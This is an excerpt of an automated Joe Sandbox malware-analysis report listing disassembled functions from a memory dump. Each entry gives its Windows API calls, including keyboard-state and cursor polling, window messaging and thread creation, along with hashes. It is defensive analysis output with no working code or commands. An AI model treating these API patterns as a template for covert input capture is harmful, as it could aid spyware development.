                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3440857362-0
                                                                                                                                                                              • Opcode ID: e85b466a66706b2d9b553c67428b864b0ccada52f06c526c264f0b01f09ede50
                                                                                                                                                                              • Instruction ID: cf1cfa36ef8d88a002c7c89784322a2f338a4ac976c5048892f45e47883d7240
                                                                                                                                                                              • Opcode Fuzzy Hash: e85b466a66706b2d9b553c67428b864b0ccada52f06c526c264f0b01f09ede50
                                                                                                                                                                              • Instruction Fuzzy Hash: 72518E31204205AFD704EF65C881EABBBF9FF88708F00491EF585872A1EB35E955DB62
                                                                                                                                                                              Function 0051CB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 8bcf4f56960f79298b95c3d022be6f57908a229486343d3412a4fb757235507a
                                                                                                                                                                              • Instruction ID: 0c4374ef216abe855216e27854b839bfddca5707f611650429308800829360b8
                                                                                                                                                                              • Opcode Fuzzy Hash: 8bcf4f56960f79298b95c3d022be6f57908a229486343d3412a4fb757235507a
                                                                                                                                                                              • Instruction Fuzzy Hash: 94412435944144AFEB20DB68DC89FE9BF79FB09320F544255F829E72D0C7729D80EAA0
                                                                                                                                                                              Function 00501726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 005017D4
                                                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 005017FD
                                                                                                                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0050183C
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00501861
                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00501869
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1389676194-0
                                                                                                                                                                              • Opcode ID: 131a2101ca62fc00898e17120c35cc6b56da13a11efc9ca3c9abf8d1de1ba4bc
                                                                                                                                                                              • Instruction ID: 4bdbc4669fa4da2cb42ede6a70e4dee7a169cc5ab4905f01b475f023029b6775
                                                                                                                                                                              • Opcode Fuzzy Hash: 131a2101ca62fc00898e17120c35cc6b56da13a11efc9ca3c9abf8d1de1ba4bc
                                                                                                                                                                              • Instruction Fuzzy Hash: 35412935A00605EFCB01EF65C981AAEBBF5FF48314B14809AF805AB362DB35ED01DB65
                                                                                                                                                                              Function 004CB736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCursorPos.USER32(000000FF), ref: 004CB749
                                                                                                                                                                              • ScreenToClient.USER32(00000000,000000FF), ref: 004CB766
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000001), ref: 004CB78B
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000002), ref: 004CB799
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4210589936-0
                                                                                                                                                                              • Opcode ID: d1743cdaa004405cd0d33c1932ff7739e7429f34e5d0d0325057e685252d378a
                                                                                                                                                                              • Instruction ID: e5f94dc5b858bf2ac667ee4e58fe19204a2af5f6693435fb59d08d2e39d5a33e
                                                                                                                                                                              • Opcode Fuzzy Hash: d1743cdaa004405cd0d33c1932ff7739e7429f34e5d0d0325057e685252d378a
                                                                                                                                                                              • Instruction Fuzzy Hash: 8541AD35504119BBDF159F64C845FEABBB8FF45324F20421AF828922D0C734AD94DBA4
                                                                                                                                                                              Function 004EC145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004EC156
                                                                                                                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 004EC200
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 004EC208
                                                                                                                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 004EC216
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 004EC21E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3382505437-0
                                                                                                                                                                              • Opcode ID: d926800c875335fc6f9eff51504ef2ac2d6d926805fa8f6df8ce4b9008d6b390
                                                                                                                                                                              • Instruction ID: 609fdc246383ed5302b3c69415d1f8d849f61b3bfe8b2d57481308b391206149
                                                                                                                                                                              • Opcode Fuzzy Hash: d926800c875335fc6f9eff51504ef2ac2d6d926805fa8f6df8ce4b9008d6b390
                                                                                                                                                                              • Instruction Fuzzy Hash: 2531CE71900259EBDB04CFA9DD8DA9E7BB5EF04316F10422AF920EA2D1C7B49905DFA0
                                                                                                                                                                              Function 004EE9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004EE9CD
                                                                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004EE9EA
                                                                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004EEA22
                                                                                                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004EEA48
                                                                                                                                                                              • _wcsstr.LIBCMT ref: 004EEA52
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3902887630-0
                                                                                                                                                                              • Opcode ID: e441fd9583d7795d401082a3e9fcd91ea024b198b8a91f56c104d9a5c5de485e
                                                                                                                                                                              • Instruction ID: 1cf06891a7c365938d95402f5fb9c9122f365a71e3e8d0f423d594b81aa36b48
                                                                                                                                                                              • Opcode Fuzzy Hash: e441fd9583d7795d401082a3e9fcd91ea024b198b8a91f56c104d9a5c5de485e
                                                                                                                                                                              • Instruction Fuzzy Hash: 2B21D771204250BBEB159B6BEC45E7F7BE9EF45750F10803FF809CA2A1DA69DC419264
                                                                                                                                                                              Function 0051DC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0051DCC0
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0051DCE4
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0051DCFC
                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 0051DD24
                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0050407D,00000000), ref: 0051DD42
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2294984445-0
                                                                                                                                                                              • Opcode ID: d5f270c76b5efbe8a02d9c1e0392a4199f5837524d99adbb3902df0b64f1702c
                                                                                                                                                                              • Instruction ID: 821347a21dd2e0b37d26c4a2b83b6bf4b79ed914e47645a8e3c175c00c934904
                                                                                                                                                                              • Opcode Fuzzy Hash: d5f270c76b5efbe8a02d9c1e0392a4199f5837524d99adbb3902df0b64f1702c
                                                                                                                                                                              • Instruction Fuzzy Hash: 2D210371614612AFDB204F78AC48BA63BB4FB55338F100B24F836C62E0D3709CA4DBA0
                                                                                                                                                                              Function 004ECA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004ECA86
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004ECAB8
                                                                                                                                                                              • __itow.LIBCMT ref: 004ECAD0
                                                                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004ECAF6
                                                                                                                                                                              • __itow.LIBCMT ref: 004ECB07
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$__itow$_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2983881199-0
                                                                                                                                                                              • Opcode ID: af534ccc3520f189f2b63b6ec045f162e1f7d01fe2b62b80b81ee7d98e3b92db
                                                                                                                                                                              • Instruction ID: 348acf1fc326dc3859aa0af805d129f34d110bb455216f238b4aae547399fef8
                                                                                                                                                                              • Opcode Fuzzy Hash: af534ccc3520f189f2b63b6ec045f162e1f7d01fe2b62b80b81ee7d98e3b92db
                                                                                                                                                                              • Instruction Fuzzy Hash: 5F212C717002447FDB20EA6B9C87FDF7A6CEF59715F00402AF905D7281D6B89D0687A9
                                                                                                                                                                              Function 005089AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 005089CE
                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 005089E5
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00508A21
                                                                                                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00508A2D
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 00508A68
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4156661090-0
                                                                                                                                                                              • Opcode ID: 91a1b00c0c3baa4a1b35509a8142fd7259d581c8991db79be02275f3f3748c22
                                                                                                                                                                              • Instruction ID: 66182d87a2dcc479e0c16d2f3655a280fb9756eaa8b6f84b04c46239664220b8
                                                                                                                                                                              • Opcode Fuzzy Hash: 91a1b00c0c3baa4a1b35509a8142fd7259d581c8991db79be02275f3f3748c22
                                                                                                                                                                              • Instruction Fuzzy Hash: 0F218175A00204AFDB00EF65DC89AAA7BF9EF48305B05847DE95A97351CA74AD04DBA0
                                                                                                                                                                              Function 004CB58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004CB5EB
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 004CB5FA
                                                                                                                                                                              • BeginPath.GDI32(?), ref: 004CB611
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 004CB63B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3225163088-0
                                                                                                                                                                              • Opcode ID: 882432b08fc4af5c52b76a584c23b705f8707bca9ad48745cb351e73669e274a
                                                                                                                                                                              • Instruction ID: 4d7e2e6a34e3a0953365472a7751363054f78e4bcf4b7e62299eb7aa9a9da65f
                                                                                                                                                                              • Opcode Fuzzy Hash: 882432b08fc4af5c52b76a584c23b705f8707bca9ad48745cb351e73669e274a
                                                                                                                                                                              • Instruction Fuzzy Hash: BA21B374900714EBCB109F19FC4ABAA3BF9FB25355F14015BE458522A0D37448D9FF9A
                                                                                                                                                                              Function 004D2E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 004D2E81
                                                                                                                                                                              • CreateThread.KERNEL32(?,?,004D2FB7,00000000,?,?), ref: 004D2EC5
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004D2ECF
                                                                                                                                                                              • _free.LIBCMT ref: 004D2ED8
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004D2EE3
                                                                                                                                                                                • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2664167353-0
                                                                                                                                                                              • Opcode ID: 3e3e6214a6abf5b55b6805ce9d8a7241545215e1bf1012b469490e35fbdce731
                                                                                                                                                                              • Instruction ID: 661e299878ecd1509ac708322f17d4fafa58061501dfa6a48fb14dd95d653155
                                                                                                                                                                              • Opcode Fuzzy Hash: 3e3e6214a6abf5b55b6805ce9d8a7241545215e1bf1012b469490e35fbdce731
                                                                                                                                                                              • Instruction Fuzzy Hash: 2A1108321043056FD710BF669D51D6B3BA8EF15774710042FF91486351EB79C8019768
                                                                                                                                                                              Function 004EB8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004EB903
                                                                                                                                                                              • GetLastError.KERNEL32(?,004EB3CB,?,?,?), ref: 004EB90D
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,004EB3CB,?,?,?), ref: 004EB91C
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,004EB3CB,?,?,?), ref: 004EB923
                                                                                                                                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004EB93A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 842720411-0
                                                                                                                                                                              • Opcode ID: 18fea67e86281f52878fa7863d8ee7fb3610d93671d492e98cf77e1a6b92adac
                                                                                                                                                                              • Instruction ID: e7ac401db8af9cb08e21172816e21462ccb03912283296dad7eb42be8b233463
                                                                                                                                                                              • Opcode Fuzzy Hash: 18fea67e86281f52878fa7863d8ee7fb3610d93671d492e98cf77e1a6b92adac
                                                                                                                                                                              • Instruction Fuzzy Hash: DD016DB1201244BFDF114FA6EC89D6B3BBDEF8A765B10042AFA45C2360DB758C44EA70
                                                                                                                                                                              Function 004F8355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F8371
                                                                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004F837F
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004F8387
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004F8391
                                                                                                                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F83CD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2833360925-0
                                                                                                                                                                              • Opcode ID: e92d4165ebbea631fae8f75ef0b1ff79e0363ea46a723ae6739a2121df9b0cf4
                                                                                                                                                                              • Instruction ID: ff429589aa159922d4a32af4756a68d1734002e421c78668bb205e3d2e29bed8
                                                                                                                                                                              • Opcode Fuzzy Hash: e92d4165ebbea631fae8f75ef0b1ff79e0363ea46a723ae6739a2121df9b0cf4
                                                                                                                                                                              • Instruction Fuzzy Hash: 65016D31D0061DDBCF00AFA4ED48AEEBB78FF19B01F00004AEA41B6260CF799554D7A5
                                                                                                                                                                              Function 004EA857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CLSIDFromProgID.OLE32 ref: 004EA874
                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 004EA88F
                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,00000000), ref: 004EA89D
                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 004EA8AD
                                                                                                                                                                              • CLSIDFromString.OLE32(?,?), ref: 004EA8B9
                                                                                                                                                                              Memory Dump Source
